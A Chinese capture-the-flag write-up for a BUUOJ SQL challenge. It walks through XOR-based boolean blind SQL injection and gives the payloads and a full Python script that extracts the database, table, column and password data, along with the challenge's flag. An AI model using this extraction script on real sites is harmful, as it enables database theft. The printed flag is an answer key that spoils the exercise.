[极客大挑战 2019]FinalSQL
题型解析
本道题考查运用 ^(异或)来进行布尔盲注。
上面几个有数字,预感是进行数字型的盲注
经过字典爆破发现一些关键词都不能用。空格也被过滤,但是 ^ 没有被过滤。
尝试一番后发现,不存在错误回显。因此,尝试盲注
利用^来进行布尔盲注
正确时:
0^1
错误时:
0^0
开始脚本编写
获取数据库:
0^(ord(substr((select(database())),"+str(x)+",1))>"+str(mid)+")
获取表名:
0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(x)+",1))>"+str(mid)+")
字段名:
0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema='F1naI1y')),"+str(x)+",1))>"+str(mid)+")
获取flag
0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(x) + ",1))>" + str(mid) + ")
flag{95bc3f03-fbb8-4ef1-b31b-8dee9ca810f5}
完整脚本:
import requests
import time
url="http://8bf0bc1e-3d13-4d37-9342-dc640f9d2b08.node4.buuoj.cn:81/search.php"
# 0^(ord(substr(database(),1,1))>32)
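def getDatabase():
    """Recover the current database name one character at a time.

    Each position ``x`` is resolved by a binary search over ASCII 32..127:
    the probe asks whether the character's code is greater than ``mid`` and
    the page answers through its body (the substring ``others~~~`` is the
    "true" signal). When the search converges ``low == hight == mid`` and
    ``chr(mid)`` is appended.

    Fix relative to the original: the early-exit check was
    ``low <= 32 or hight >= 127``, which is always true right after the first
    probe (whichever bound did not move is still at its initial value), so
    every character was emitted after a single request. The check now uses
    the strict comparisons the other probes in this file use; since the
    bounds only ever move inward it is effectively inert, and the search
    runs to convergence.

    There is no stop condition tied to the result: the loop always walks all
    999 positions and prints the accumulated name after each one.
    """
    database_name = ""
    for x in range(1, 1000):
        low = 32
        hight = 127
        mid = (low + hight) // 2
        while low < hight:
            params = {
                "id": "0^(ord(substr((select(database())),"+str(x)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=url, params=params)
            if "others~~~" in r.text:
                # Oracle answered "greater than mid": raise the lower bound.
                low = mid + 1
            else:
                hight = mid
            mid = (low + hight) // 2
            # Bounds only narrow from 32/127, so this cannot fire; kept for
            # parity with getTable/getColmun/getFlag.
            if low < 32 or hight > 127:
                break
        database_name += chr(mid)
        print("数据库为:", database_name)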
def getTable():
    """Recover the comma-joined table names of schema ``geek``, character by character.

    For every position ``x`` a binary search over ASCII 32..127 is driven by
    the page: the response containing ``others~~~`` means "the code is
    greater than ``mid``". The converged value is appended and the partial
    result is printed; a one-second pause follows each character. As in the
    sibling probes, the bound check inside the loop can never trigger
    (bounds start at 32/127 and only move inward) and the outer loop has no
    data-dependent stop, so all 999 positions are walked.
    """
    tables_name = ""
    for x in range(1, 1000):
        lo, hi = 32, 127
        mid = (lo + hi) // 2
        while lo < hi:
            payload = (
                "0^(ord(substr((select(group_concat(table_name))"
                f"from(information_schema.tables)where(table_schema='geek')),{x},1))>{mid})"
            )
            r = requests.get(url=url, params={"id": payload})
            if "others~~~" in r.text:
                lo = mid + 1
            else:
                hi = mid
            mid = (lo + hi) // 2
            if lo < 32 or hi > 127:
                break
        tables_name += chr(mid)
        print("table:", tables_name)
        time.sleep(1)
# F1naI1y,Flaaaaag
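def getColmun():
    """Recover the comma-joined column names of table ``F1naI1y``, character by character.

    Same binary-search-over-ASCII scheme as getTable: ``others~~~`` in the
    response means "greater than ``mid``"; the converged code is appended
    and the partial result printed, with a one-second pause per character.

    Fix relative to the original: the search loop header was written twice
    (``while left<right:`` immediately nested in an identical ``while``).
    The duplicate was redundant, and it meant the ``break`` inside only left
    the inner loop. A single loop is kept here. The in-loop bound check
    cannot fire with bounds that start at 32/127 and only move inward; it is
    retained for parity with the other probes.
    """
    column_name = ""
    for x in range(1, 1000):
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            params = {
                "id": "0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y'))," + str(x) + ",1))>" + str(mid) + ")"
            }
            r = requests.get(url=url, params=params)
            if "others~~~" in r.text:
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
            if left < 32 or right > 127:
                break
        # At convergence left == right == mid.
        column_name += chr(mid)
        print("column:", column_name)
        time.sleep(1)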
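def getFlag():
    """Recover the comma-joined ``password`` column of ``F1naI1y``, character by character.

    Same binary-search-over-ASCII scheme as the other probes: ``others~~~``
    in the response means "greater than ``mid``"; the converged code is
    appended, the partial result printed, and a one-second pause follows
    each character.

    Fix relative to the original: the search loop header was duplicated
    (``while left<right:`` directly nested in an identical ``while``), so the
    ``break`` inside only left the inner loop. A single loop is kept here.
    The in-loop bound check cannot fire with bounds that start at 32/127 and
    only move inward; it is retained for parity with the other probes.
    """
    flag = ""
    for x in range(1, 1000):
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            params = {
                "id": "0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(x) + ",1))>" + str(mid) + ")"
            }
            r = requests.get(url=url, params=params)
            if "others~~~" in r.text:
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
            if left < 32 or right > 127:
                break
        # At convergence left == right == mid.
        flag += chr(mid)
        print("flag:", flag)
        time.sleep(1)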
# Run the four extraction stages in order at import/run time, exactly as the
# original script does (database, then tables, then columns, then the
# password column). Each stage prints its own progress.
for stage in (getDatabase, getTable, getColmun, getFlag):
    stage()
# flag{95bc3f03-fbb8-4ef1-b31b-8dee9ca810f5}
本次,布尔盲注采用了二分法查找,关于二分法可以看小恐龙的数的范围h